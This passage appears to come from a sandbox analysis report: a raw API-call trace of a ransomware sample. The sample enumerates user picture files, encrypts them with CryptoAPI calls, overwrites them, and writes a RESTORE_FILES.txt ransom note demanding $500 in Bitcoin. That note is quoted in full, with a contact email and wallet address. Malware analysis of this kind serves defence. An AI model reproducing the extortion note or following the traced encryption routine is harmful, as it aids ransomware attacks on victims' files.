(lpFirst="usertile32.bmp", lpSrch=".protected") returned 0x0 [0071.522] lstrcmpW (lpString1="usertile32.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.522] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.522] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.522] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Windows") returned -1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files") returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files (x86)") returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="$Recycle.bin") returned 1 [0071.522] lstrcmpiW (lpString1="usertile33.bmp", lpString2="System Volume Information") returned 1 [0071.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 82 [0071.522] StrStrIW (lpFirst="usertile33.bmp", lpSrch=".protected") returned 0x0 [0071.522] lstrcmpW (lpString1="usertile33.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.522] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.522] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.524] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Windows") returned -1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files") returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files (x86)") returned 1 [0071.524] lstrcmpiW 
(lpString1="usertile34.bmp", lpString2="$Recycle.bin") returned 1 [0071.524] lstrcmpiW (lpString1="usertile34.bmp", lpString2="System Volume Information") returned 1 [0071.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 82 [0071.524] StrStrIW (lpFirst="usertile34.bmp", lpSrch=".protected") returned 0x0 [0071.524] lstrcmpW (lpString1="usertile34.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.524] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.524] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="Windows") returned -1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="Program Files") returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="Program Files (x86)") returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="$Recycle.bin") returned 1 [0071.528] lstrcmpiW (lpString1="usertile35.bmp", lpString2="System Volume Information") returned 1 [0071.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile35.bmp") returned 82 [0071.528] StrStrIW (lpFirst="usertile35.bmp", lpSrch=".protected") returned 0x0 [0071.528] lstrcmpW (lpString1="usertile35.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="Windows") returned -1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="Program Files") returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="Program Files (x86)") returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="$Recycle.bin") returned 1 [0071.528] lstrcmpiW (lpString1="usertile36.bmp", lpString2="System Volume Information") returned 1 [0071.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 82 [0071.528] StrStrIW (lpFirst="usertile36.bmp", lpSrch=".protected") returned 0x0 [0071.528] lstrcmpW (lpString1="usertile36.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.528] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="Windows") returned -1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="Program Files") returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="Program Files (x86)") returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="$Recycle.bin") returned 1 [0071.528] lstrcmpiW (lpString1="usertile37.bmp", lpString2="System Volume Information") returned 1 [0071.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 82 [0071.528] StrStrIW (lpFirst="usertile37.bmp", lpSrch=".protected") returned 0x0 [0071.528] lstrcmpW (lpString1="usertile37.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.529] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.529] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.529] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: 
"c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.529] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="Windows") returned -1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="Program Files") returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="Program Files (x86)") returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="$Recycle.bin") returned 1 [0071.529] lstrcmpiW (lpString1="usertile38.bmp", lpString2="System Volume Information") returned 1 [0071.529] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 82 [0071.529] StrStrIW (lpFirst="usertile38.bmp", lpSrch=".protected") returned 0x0 [0071.529] lstrcmpW (lpString1="usertile38.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.529] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.529] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.529] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.531] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="Windows") returned -1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="Program Files") returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="Program Files (x86)") returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="$Recycle.bin") returned 1 [0071.531] lstrcmpiW (lpString1="usertile39.bmp", lpString2="System Volume Information") returned 1 [0071.531] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 82 [0071.531] StrStrIW (lpFirst="usertile39.bmp", lpSrch=".protected") returned 0x0 [0071.531] lstrcmpW (lpString1="usertile39.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.531] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.531] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="Windows") returned -1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="Program Files") returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="Program Files (x86)") returned 1 [0071.531] lstrcmpiW 
(lpString1="usertile40.bmp", lpString2="$Recycle.bin") returned 1 [0071.531] lstrcmpiW (lpString1="usertile40.bmp", lpString2="System Volume Information") returned 1 [0071.531] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 82 [0071.531] StrStrIW (lpFirst="usertile40.bmp", lpSrch=".protected") returned 0x0 [0071.533] lstrcmpW (lpString1="usertile40.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.533] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.533] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.533] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="Windows") returned -1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="Program Files") returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="Program Files (x86)") returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="$Recycle.bin") returned 1 [0071.533] lstrcmpiW (lpString1="usertile41.bmp", lpString2="System Volume Information") returned 1 [0071.533] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile41.bmp") returned 82 [0071.533] StrStrIW (lpFirst="usertile41.bmp", lpSrch=".protected") returned 0x0 [0071.533] lstrcmpW (lpString1="usertile41.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.533] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.533] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.534] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="Windows") returned -1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="Program Files") returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="Program Files (x86)") returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="$Recycle.bin") returned 1 [0071.534] lstrcmpiW (lpString1="usertile42.bmp", lpString2="System Volume Information") returned 1 [0071.534] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 82 [0071.534] StrStrIW (lpFirst="usertile42.bmp", lpSrch=".protected") returned 0x0 [0071.534] lstrcmpW (lpString1="usertile42.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.534] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.534] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="Windows") returned -1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="Program Files") returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="Program Files (x86)") returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="$Recycle.bin") returned 1 [0071.534] lstrcmpiW (lpString1="usertile43.bmp", lpString2="System Volume Information") returned 1 [0071.534] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 82 [0071.534] StrStrIW (lpFirst="usertile43.bmp", lpSrch=".protected") returned 0x0 [0071.534] lstrcmpW (lpString1="usertile43.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: 
"c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.534] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.534] lstrcmpiW (lpString1="usertile44.bmp", lpString2="Windows") returned -1 [0071.534] lstrcmpiW (lpString1="usertile44.bmp", lpString2="Program Files") returned 1 [0071.534] lstrcmpiW (lpString1="usertile44.bmp", lpString2="Program Files (x86)") returned 1 [0071.535] lstrcmpiW (lpString1="usertile44.bmp", lpString2="$Recycle.bin") returned 1 [0071.535] lstrcmpiW (lpString1="usertile44.bmp", lpString2="System Volume Information") returned 1 [0071.535] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 82 [0071.535] StrStrIW (lpFirst="usertile44.bmp", lpSrch=".protected") returned 0x0 [0071.535] lstrcmpW (lpString1="usertile44.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.535] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 0 [0071.535] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.535] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt") returned 85 [0071.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.540] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.540] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.540] lstrlenA (lpString="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") returned 684 [0071.540] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.540] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.540] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.540] CloseHandle (hObject=0xb4) returned 1 [0071.541] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="Windows") returned -1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="Program Files") returned -1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="Program Files (x86)") returned -1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="$Recycle.bin") returned 1 [0071.541] lstrcmpiW (lpString1="guest.bmp", lpString2="System Volume Information") returned -1 [0071.541] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrIW (lpFirst="guest.bmp", lpSrch=".protected") returned 0x0 [0071.541] lstrcmpW (lpString1="guest.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0071.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0071.541] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0071.541] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.541] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrW (lpFirst="guest.bmp", lpSrch=".txt") returned 0x0 [0071.541] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrW (lpFirst="guest.bmp", lpSrch=".rar") returned 0x0 [0071.541] 
lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0071.541] StrStrW (lpFirst="guest.bmp", lpSrch=".zip") returned 0x0 [0071.541] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.551] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.552] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.552] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.552] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 